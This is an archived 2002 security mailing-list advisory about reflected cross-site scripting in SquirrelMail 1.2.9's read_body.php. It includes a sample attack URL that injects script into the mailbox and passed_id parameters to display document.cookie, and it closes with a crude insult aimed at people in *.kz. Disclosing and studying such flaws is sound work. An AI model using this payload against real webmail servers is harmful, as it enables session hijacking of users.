SquirrelMail v1.2.9 XSS bugs

From: euronymous (just-a-userat_private)
Date: Mon Dec 02 2002 - 20:28:14 PST

Next message: Mike Cramp: "Zeroo Webserver remote directory traversal exploit"

Previous message: Liu Die Yu: "Poisonous Style for Dialog window turns the zone off."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
	      
description
-----------
when reading some email you can to insert the scripting code..
read_body.php dont make filtering users input in `mailbox' and
`passed_id' variables. btw, today has released v1.2.10. im dont
know if this version contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

not URL-encoded string working fine also.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
russian security guyz!! 
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================

Next message: Mike Cramp: "Zeroo Webserver remote directory traversal exploit"
Previous message: Liu Die Yu: "Poisonous Style for Dialog window turns the zone off."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 03 2002 - 11:12:02 PST